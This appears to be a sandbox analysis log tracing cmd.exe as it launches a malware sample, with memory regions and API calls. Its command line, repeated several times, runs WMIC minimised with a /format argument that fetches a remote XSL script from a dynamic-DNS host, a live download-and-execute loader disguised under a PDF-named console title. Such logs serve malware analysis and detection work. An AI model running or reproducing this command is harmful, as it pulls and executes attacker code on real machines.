# Flog Txt Version 1
# Analyzer Version: 2.3.1
# Analyzer Build Date: Oct 19 2018 13:03:14
# Log Creation Date: 22.10.2018 05:25:59.493
Process:
id = "1"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x7f1be220"
os_pid = "0x984"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x0"
cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /k start /MIN C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" && exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 136
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 137
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 138
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 139
start_va = 0x70000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 140
start_va = 0x4ab60000
end_va = 0x4ababfff
entry_point = 0x4ab60000
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 141
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 142
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 143
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 144
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 145
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 146
start_va = 0x300000
end_va = 0x3fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 147
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 148
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 149
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 150
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 151
start_va = 0x170000
end_va = 0x1d6fff
entry_point = 0x170000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 152
start_va = 0x73270000
end_va = 0x73276fff
entry_point = 0x73270000
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 153
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 154
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 155
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 156
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 157
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 158
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 159
start_va = 0x1e0000
end_va = 0x2a7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 160
start_va = 0x580000
end_va = 0x58ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 161
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 162
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 163
start_va = 0x50000
end_va = 0x56fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 164
start_va = 0x60000
end_va = 0x61fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 165
start_va = 0x2b0000
end_va = 0x2b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 166
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 167
start_va = 0x400000
end_va = 0x500fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000400000"
filename = ""
Region:
id = 168
start_va = 0x590000
end_va = 0x118ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000590000"
filename = ""
Region:
id = 169
start_va = 0x1190000
end_va = 0x12f2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001190000"
filename = ""
Thread:
id = 1
os_tid = 0x988
[0033.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16facc | out: lpSystemTimeAsFileTime=0x16facc*(dwLowDateTime=0xc9d3f290, dwHighDateTime=0x1d469c7))
[0033.968] GetCurrentProcessId () returned 0x984
[0033.968] GetCurrentThreadId () returned 0x988
[0033.968] GetTickCount () returned 0x18ab1
[0033.968] QueryPerformanceCounter (in: lpPerformanceCount=0x16fac4 | out: lpPerformanceCount=0x16fac4*=1810791400000) returned 1
[0033.969] GetModuleHandleA (lpModuleName=0x0) returned 0x4ab60000
[0033.969] __set_app_type (_Type=0x1)
[0033.969] __p__fmode () returned 0x757a31f4
[0033.969] __p__commode () returned 0x757a31fc
[0033.969] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab821a6) returned 0x0
[0033.969] __getmainargs (in: _Argc=0x4ab84238, _Argv=0x4ab84240, _Env=0x4ab8423c, _DoWildCard=0, _StartInfo=0x4ab84140 | out: _Argc=0x4ab84238, _Argv=0x4ab84240, _Env=0x4ab8423c) returned 0
[0033.969] GetCurrentThreadId () returned 0x988
[0033.969] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x988) returned 0x38
[0033.969] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75370000
[0033.969] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0033.970] SetThreadUILanguage (LangId=0x0) returned 0x409
[0033.970] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0033.970] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fa5c | out: phkResult=0x16fa5c*=0x0) returned 0x2
[0033.970] VirtualQuery (in: lpAddress=0x16fa93, lpBuffer=0x16fa2c, dwLength=0x1c | out: lpBuffer=0x16fa2c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0033.970] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fa2c, dwLength=0x1c | out: lpBuffer=0x16fa2c*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
[0033.970] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fa2c, dwLength=0x1c | out: lpBuffer=0x16fa2c*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
[0033.970] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fa2c, dwLength=0x1c | out: lpBuffer=0x16fa2c*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
[0033.970] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fa2c, dwLength=0x1c | out: lpBuffer=0x16fa2c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
[0033.970] GetConsoleOutputCP () returned 0x1b5
[0033.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab84260 | out: lpCPInfo=0x4ab84260) returned 1
[0033.970] SetConsoleCtrlHandler (HandlerRoutine=0x4ab7e72a, Add=1) returned 1
[0033.971] _get_osfhandle (_FileHandle=1) returned 0x7
[0033.971] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
[0033.971] _get_osfhandle (_FileHandle=1) returned 0x7
[0033.971] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab841ac | out: lpMode=0x4ab841ac) returned 1
[0033.971] _get_osfhandle (_FileHandle=1) returned 0x7
[0033.971] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0033.971] _get_osfhandle (_FileHandle=0) returned 0x3
[0033.971] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab841b0 | out: lpMode=0x4ab841b0) returned 1
[0033.971] _get_osfhandle (_FileHandle=0) returned 0x3
[0033.972] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
[0033.972] GetEnvironmentStringsW () returned 0x3102e0*
[0033.972] FreeEnvironmentStringsW (penv=0x3102e0) returned 1
[0033.972] GetEnvironmentStringsW () returned 0x3102e0*
[0033.972] FreeEnvironmentStringsW (penv=0x3102e0) returned 1
[0033.972] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9cc | out: phkResult=0x16e9cc*=0x40) returned 0x0
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x0, lpData=0x16e9d8*=0x90, lpcbData=0x16e9d0*=0x1000) returned 0x2
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x1, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x0, lpData=0x16e9d8*=0x1, lpcbData=0x16e9d0*=0x1000) returned 0x2
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x0, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x40, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x40, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.972] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x0, lpData=0x16e9d8*=0x40, lpcbData=0x16e9d0*=0x1000) returned 0x2
[0033.973] RegCloseKey (hKey=0x40) returned 0x0
[0033.973] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9cc | out: phkResult=0x16e9cc*=0x40) returned 0x0
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x0, lpData=0x16e9d8*=0x40, lpcbData=0x16e9d0*=0x1000) returned 0x2
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x1, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x0, lpData=0x16e9d8*=0x1, lpcbData=0x16e9d0*=0x1000) returned 0x2
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x0, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x9, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x4, lpData=0x16e9d8*=0x9, lpcbData=0x16e9d0*=0x4) returned 0x0
[0033.973] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9d4, lpData=0x16e9d8, lpcbData=0x16e9d0*=0x1000 | out: lpType=0x16e9d4*=0x0, lpData=0x16e9d8*=0x9, lpcbData=0x16e9d0*=0x1000) returned 0x2
[0033.973] RegCloseKey (hKey=0x40) returned 0x0
[0033.973] time (in: timer=0x0 | out: timer=0x0) returned 0x5bcd5f86
[0033.973] srand (_Seed=0x5bcd5f86)
[0033.973] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /k start /MIN C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" && exit"
[0033.973] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /k start /MIN C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" && exit"
[0033.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab85260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0033.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311a40, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
[0033.974] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
[0033.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0033.974] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab90640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0033.974] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
[0033.974] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
[0033.974] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
[0033.974] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
[0033.974] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
[0033.974] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
[0033.974] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
[0033.974] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
[0033.974] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
[0033.974] GetEnvironmentStringsW () returned 0x312430*
[0033.975] FreeEnvironmentStringsW (penv=0x312430) returned 1
[0033.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0033.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab90640, nSize=0x2000 | out: lpBuffer="") returned 0x0
[0033.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
[0033.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
[0033.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
[0033.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
[0033.975] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
[0033.975] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
[0033.975] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
[0033.975] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
[0033.975] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f798 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0033.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x16f798, lpFilePart=0x16f794 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x16f794*="system32") returned 0x13
[0033.975] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
[0033.975] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x16f514 | out: lpFindFileData=0x16f514) returned 0x310ac0
[0033.975] FindClose (in: hFindFile=0x310ac0 | out: hFindFile=0x310ac0) returned 1
[0033.975] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x16f514 | out: lpFindFileData=0x16f514) returned 0x310ac0
[0033.976] FindClose (in: hFindFile=0x310ac0 | out: hFindFile=0x310ac0) returned 1
[0033.976] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
[0033.976] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
[0033.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
[0033.976] GetEnvironmentStringsW () returned 0x3102e0*
[0033.976] FreeEnvironmentStringsW (penv=0x3102e0) returned 1
[0033.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab85260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0033.977] GetConsoleOutputCP () returned 0x1b5
[0033.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab84260 | out: lpCPInfo=0x4ab84260) returned 1
[0033.977] GetUserDefaultLCID () returned 0x409
[0033.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab84950, cchData=8 | out: lpLCData=":") returned 2
[0033.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f8d8, cchData=128 | out: lpLCData="0") returned 2
[0033.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f8d8, cchData=128 | out: lpLCData="0") returned 2
[0033.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f8d8, cchData=128 | out: lpLCData="1") returned 2
[0033.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab84940, cchData=8 | out: lpLCData="/") returned 2
[0033.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab84d80, cchData=32 | out: lpLCData="Mon") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab84d40, cchData=32 | out: lpLCData="Tue") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab84d00, cchData=32 | out: lpLCData="Wed") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab84cc0, cchData=32 | out: lpLCData="Thu") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab84c80, cchData=32 | out: lpLCData="Fri") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab84c40, cchData=32 | out: lpLCData="Sat") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab84c00, cchData=32 | out: lpLCData="Sun") returned 4
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab84930, cchData=8 | out: lpLCData=".") returned 2
[0033.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab84920, cchData=8 | out: lpLCData=",") returned 2
[0033.978] setlocale (category=0, locale=".OCP") returned="English_United States.437"
[0033.979] GetConsoleTitleW (in: lpConsoleTitle=0x300980, nSize=0x104 | out: lpConsoleTitle="resultado-623472740.PDF") returned 0x17
[0033.979] _get_osfhandle (_FileHandle=1) returned 0x7
[0033.979] GetFileType (hFile=0x7) returned 0x2
[0033.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0033.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f9d4 | out: lpMode=0x16f9d4) returned 1
[0033.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0033.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16f9f0 | out: lpConsoleScreenBufferInfo=0x16f9f0) returned 1
[0033.980] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0033.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16f9bc | out: lpConsoleScreenBufferInfo=0x16f9bc) returned 1
[0033.980] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16f9d4 | out: lpNumberOfAttrsWritten=0x16f9d4) returned 1
[0033.981] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0033.981] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75370000
[0033.981] GetProcAddress (hModule=0x75370000, lpProcName="CopyFileExW") returned 0x753aac6c
[0033.981] GetProcAddress (hModule=0x75370000, lpProcName="IsDebuggerPresent") returned 0x753b3ea8
[0033.981] GetProcAddress (hModule=0x75370000, lpProcName="SetConsoleInputExeNameW") returned 0x753c2732
[0033.982] _wcsicmp (_String1="start", _String2=")") returned 74
[0033.982] _wcsicmp (_String1="FOR", _String2="start") returned -13
[0033.982] _wcsicmp (_String1="FOR/?", _String2="start") returned -13
[0033.982] _wcsicmp (_String1="IF", _String2="start") returned -10
[0033.982] _wcsicmp (_String1="IF/?", _String2="start") returned -10
[0033.984] _wcsicmp (_String1="REM", _String2="start") returned -1
[0033.984] _wcsicmp (_String1="REM/?", _String2="start") returned -1
[0033.992] _wcsicmp (_String1="FOR", _String2="exit") returned 1
[0033.993] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1
[0033.993] _wcsicmp (_String1="IF", _String2="exit") returned 4
[0033.993] _wcsicmp (_String1="IF/?", _String2="exit") returned 4
[0033.993] _wcsicmp (_String1="REM", _String2="exit") returned 13
[0033.993] _wcsicmp (_String1="REM/?", _String2="exit") returned 13
[0033.993] GetConsoleTitleW (in: lpConsoleTitle=0x16f56c, nSize=0x104 | out: lpConsoleTitle="resultado-623472740.PDF") returned 0x17
[0033.994] _wcsicmp (_String1="start", _String2="DIR") returned 15
[0033.994] _wcsicmp (_String1="start", _String2="ERASE") returned 14
[0033.994] _wcsicmp (_String1="start", _String2="DEL") returned 15
[0033.994] _wcsicmp (_String1="start", _String2="TYPE") returned -1
[0033.994] _wcsicmp (_String1="start", _String2="COPY") returned 16
[0033.994] _wcsicmp (_String1="start", _String2="CD") returned 16
[0033.994] _wcsicmp (_String1="start", _String2="CHDIR") returned 16
[0033.994] _wcsicmp (_String1="start", _String2="RENAME") returned 1
[0033.994] _wcsicmp (_String1="start", _String2="REN") returned 1
[0033.994] _wcsicmp (_String1="start", _String2="ECHO") returned 14
[0033.994] _wcsicmp (_String1="start", _String2="SET") returned 15
[0033.994] _wcsicmp (_String1="start", _String2="PAUSE") returned 3
[0033.994] _wcsicmp (_String1="start", _String2="DATE") returned 15
[0033.994] _wcsicmp (_String1="start", _String2="TIME") returned -1
[0033.994] _wcsicmp (_String1="start", _String2="PROMPT") returned 3
[0033.994] _wcsicmp (_String1="start", _String2="MD") returned 6
[0033.994] _wcsicmp (_String1="start", _String2="MKDIR") returned 6
[0033.994] _wcsicmp (_String1="start", _String2="RD") returned 1
[0033.994] _wcsicmp (_String1="start", _String2="RMDIR") returned 1
[0033.994] _wcsicmp (_String1="start", _String2="PATH") returned 3
[0033.994] _wcsicmp (_String1="start", _String2="GOTO") returned 12
[0033.994] _wcsicmp (_String1="start", _String2="SHIFT") returned 12
[0033.994] _wcsicmp (_String1="start", _String2="CLS") returned 16
[0033.994] _wcsicmp (_String1="start", _String2="CALL") returned 16
[0033.996] _wcsicmp (_String1="start", _String2="VERIFY") returned -3
[0033.996] _wcsicmp (_String1="start", _String2="VER") returned -3
[0033.996] _wcsicmp (_String1="start", _String2="VOL") returned -3
[0033.996] _wcsicmp (_String1="start", _String2="EXIT") returned 14
[0033.996] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15
[0033.996] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14
[0033.996] _wcsicmp (_String1="start", _String2="TITLE") returned -1
[0033.996] _wcsicmp (_String1="start", _String2="START") returned 0
